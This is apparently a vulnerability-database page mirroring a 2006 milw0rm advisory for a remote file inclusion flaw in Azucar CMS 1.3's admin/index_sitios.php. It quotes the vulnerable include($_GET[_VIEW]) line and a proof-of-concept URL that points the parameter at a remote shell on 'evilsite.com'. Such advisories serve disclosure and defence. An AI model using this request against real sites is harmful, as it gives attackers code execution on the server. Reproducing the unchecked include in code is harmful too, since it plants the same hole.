header-logo
Suggest Exploit
vendor:
Azucar CMS
by:
nuffsaid
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Azucar CMS
Affected Version From: Azucar CMS <= 1.3
Affected Version To: Azucar CMS <= 1.3
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Azucar CMS <= 1.3 (_VIEW) Remote File Include Vulnerability

Azucar CMS admin/index_sitios.php uses the include function insecurely on the $_GET[_VIEW] paramater passed to the script, a remote file can be specified and executed on the server.

Mitigation:

Ensure that user input is validated and filtered before being passed to the include function.
Source

Exploit-DB raw data:

+-------------------------------------------------------------------------------------------
+ Azucar CMS <= 1.3 (_VIEW) Remote File Include Vulnerability
+-------------------------------------------------------------------------------------------
+ Affected Software .: Azucar CMS <= 1.3
+ Download ..........: http://downloads.sourceforge.net/azucarcms/azucarcms1.3.zip
+ Description .......: "Azucar is a modular content management system designed to be extremely user friendly"
+ Class .............: Remote File Inclusion
+ Risk ..............: High (Remote File Execution)
+ Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
+-------------------------------------------------------------------------------------------
+ Details:
+ Azucar CMS admin/index_sitios.php uses the include function insecurely on the $_GET[_VIEW]
+ paramater passed to the script, a remote file can be specified and executed on the server.
+
+ Vulnerable Code: 
+ admin/index_sitios.php, line(s) 14-15:
+ -> 14-15: if (isset($_GET[_VIEW])) include($_GET[_VIEW]);
+
+ Proof Of Concept:
+ http://[target]/[path]/admin/index_sitios.php?_VIEW=http://evilsite.com/shell.php
+-------------------------------------------------------------------------------------------

# milw0rm.com [2006-12-18]